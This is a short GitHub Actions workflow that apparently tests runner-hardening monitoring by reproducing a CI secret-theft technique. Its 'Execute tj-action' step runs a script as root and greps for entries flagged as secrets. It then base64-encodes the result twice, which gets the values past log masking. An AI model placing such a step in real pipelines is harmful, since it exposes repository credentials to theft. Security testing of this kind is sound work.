name: LockDown-Runner-Worker
on:
  workflow_dispatch:

jobs:
  build:
    name: Deploy2
    runs-on: ubuntu-latest
    steps:
      - uses: step-security/harden-runner@rc
        with:
          egress-policy: audit
      - name: Code Checkout
        uses: actions/checkout@v2
        with:
          fetch-depth: 2
          
      - name: Curl google
        run: "curl -s https://google.com"

      - name: Execute tj-action
        run: | 
          sudo python3 tj.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0
                  
      - name: Curl youtube
        run: "curl -s https://youtube.com"

      - run: sleep 2